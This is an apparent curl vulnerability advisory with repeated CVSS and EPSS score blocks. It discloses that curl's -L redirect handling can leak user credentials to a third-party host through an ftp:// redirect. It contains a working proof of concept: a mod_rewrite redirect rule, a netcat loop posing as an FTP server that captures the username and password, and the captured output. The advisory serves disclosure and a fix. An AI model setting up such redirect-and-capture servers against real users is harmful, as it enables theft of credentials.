5.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
33.1%
Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.
firstsite.tld
to perform redirect with mod_rewrite:
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
secondsite.tld
for example with:while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
curl -L --user foo https://firstsite.tld/redirectpoc
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
There are several issues here:
firstsite.tld
vs secondsite.tld
). This is definitely not what the user could expect, considering the documentation says:I believe the credentials should not be sent in this case unless if --location-trusted
is used.
It might even be sensible to consider making curl stop sending credentials over downgraded security by default even when --location-trusted
is used. Maybe there could be some option that could be used to enable such downgrade if the user REALLY wants it.
Leak of confidential information (user credentials).
5.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
33.1%